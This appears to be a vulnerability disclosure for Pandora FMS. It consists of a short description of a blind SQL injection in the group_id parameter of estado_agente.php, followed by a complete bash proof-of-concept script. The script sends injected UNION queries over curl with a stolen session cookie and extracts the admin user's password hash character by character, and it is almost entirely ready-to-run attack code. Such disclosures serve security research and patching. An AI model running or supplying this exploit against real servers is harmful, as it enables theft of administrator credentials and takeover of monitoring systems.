The group_id parameter of operation/agentes/estado_agente.php is vulnerable to boolean-based blind SQL injection: an attacker-controlled condition is injected into the query, and its truth value is inferred from whether the page renders the UNIONed agent list (the PoC below uses this to recover a user's password hash one character at a time).
PoC:
Exploit:
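#!/bin/bash
# Pandora Flexible Monitoring System Blind SQL Injection PoC
# Juan Galiana Lara
#
# Boolean-based blind SQL injection through the group_id parameter of
# operation/agentes/estado_agente. Recovers the 32-character md5 password
# hash of TARGET_USER one character at a time: for each position and each
# candidate character the condition
#   ord(substring(password, <pos>, 1)) = <ascii(candidate)>
# is injected into the query; when it is true the UNIONed agent list is
# rendered and the response contains PATTERN, otherwise it does not.
#
# Configure HOST, COOKIE (PHPSESSID of a logged-in session) and GROUP_ID
# before use.
# Usage:
#   $ ./getpassword.sh
#   74b444ff2785ea8bb9ae02c13b6a71f1
# Exit status: 0 on success; 1 if a request failed or no candidate matched
# a position (stale cookie, wrong group id, or PATTERN no longer present in
# the page); 2 if HOST was left at its placeholder value.

set -u

HOST="HOST"
TARGET_USER="0x61646d696e"  # hex literal for 'admin' -- keeps quotes out of the payload
PATTERN="Interval"          # rendered only when the UNION actually returns rows
COOKIE="rq842tci6e5ib7t918c6sv1ml4"
# An md5 hex digest only uses [0-9a-f]; the wider charset is kept from the
# original so a non-md5 (e.g. plaintext) password is still partially recoverable.
CHARSET=(0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v w x y z)
GROUP_ID=2
HASH_LEN=32

if [[ "$HOST" == "HOST" ]]; then
  printf 'Set HOST, COOKIE and GROUP_ID at the top of the script before running it.\n' >&2
  exit 2
fi

#######################################
# ASCII code of a single character.
# Arguments: $1 - one character
# Outputs:   decimal ordinal on stdout
#######################################
char_ord() {
  # printf %d on a leading-quote string yields the code of the next character
  # (the original `printf %d "$ch"` only works by accident for digits and is 0
  # for letters, so the injected comparison could never match a-f).
  printf '%d' "'$1"
}

#######################################
# Build the injected URL for one (position, ordinal) probe.
# Arguments: $1 - 1-based character position in the hash
#            $2 - ASCII code of the candidate character
# Outputs:   full URL on stdout (payload is already percent-encoded)
#######################################
probe_url() {
  local pos=$1 code=$2
  printf '%s' "http://$HOST/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=$GROUP_ID%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,$pos,1%29%29=$code%20and%20id_user=$TARGET_USER%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281"
}

pos=1
while (( pos <= HASH_LEN )); do
  found=0
  for ch in "${CHARSET[@]}"; do
    code=$(char_ord "$ch")
    url=$(probe_url "$pos" "$code")
    # One request per candidate. Abort on a transport failure instead of
    # silently treating an unreachable host as "no character matched".
    if ! body=$(curl -s --max-time 30 --cookie "PHPSESSID=$COOKIE" -- "$url"); then
      printf '\nHTTP request failed at position %d (host reachable?)\n' "$pos" >&2
      exit 1
    fi
    if grep -q -- "$PATTERN" <<<"$body"; then
      printf '%s' "$ch"
      found=1
      break
    fi
  done
  if (( found == 0 )); then
    printf '\nSomething went wrong!\n' >&2
    exit 1
  fi
  (( pos++ ))
done
printf '\n'
exit 0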